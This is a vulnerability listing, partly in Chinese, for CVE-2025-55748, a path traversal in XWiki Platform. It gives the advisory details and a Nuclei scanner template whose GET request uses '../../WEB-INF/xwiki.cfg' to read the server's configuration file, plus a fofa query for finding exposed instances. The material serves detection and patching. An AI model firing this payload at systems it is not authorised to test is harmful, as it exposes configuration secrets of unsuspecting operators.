漏洞描述
XWiki Platform 4.2-milestone-2 through 16.10.6 contains a path traversal caused by improper access control in jsx and sx endpoints, letting remote attackers read configuration files, exploit requires no special privileges.
CVE-2025-55748: XWiki Platform - Path Traversal
PoC代码[已公开]
id: CVE-2025-55748
info:
name: XWiki Platform - Path Traversal
author: Redmomn
severity: high
description: |
XWiki Platform 4.2-milestone-2 through 16.10.6 contains a path traversal caused by improper access control in jsx and sx endpoints, letting remote attackers read configuration files, exploit requires no special privileges.
impact: |
Remote attackers can read sensitive configuration files, potentially exposing critical system information.
remediation: |
Upgrade to version 16.10.7 or later.
reference:
- https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-m63c-3rmg-r2cf
- https://github.com/xwiki/xwiki-platform/commit/9e7b4c03f2143978d891109a17159f73d4cdd318#diff-ee78930a9ac5ea586179fe8ab88a5fd58e369d175927d1e88a0b4dbc3ebcbf1eR62
- https://nvd.nist.gov/vuln/detail/CVE-2025-55748
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2025-55748
epss-score: 0.01822
epss-percentile: 0.82301
cwe-id: CWE-23
metadata:
verified: true
max-request: 1
fofa-query: app="XWIKI-Platform"
tags: cve,cve2025,xwiki,lfi,vuln,vkev
http:
- method: GET
path:
- '{{BaseURL}}/bin/ssx/Main/WebHome?resource=../../WEB-INF/xwiki.cfg&minify=false'
matchers:
- type: dsl
dsl:
- 'contains_all(body, "xwiki.editcomment=","xwiki.plugins=","xwiki.encoding=")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100b86145a86ac7620a86eeb572c22a675287d96e9e81cdbfb5e7fbd788769a054d022100ec769501bd0c01d810098e43b32528392a5517cc289b6677d8ad6fd6fd18065e:922c64590222798bb761d5b6d8e72950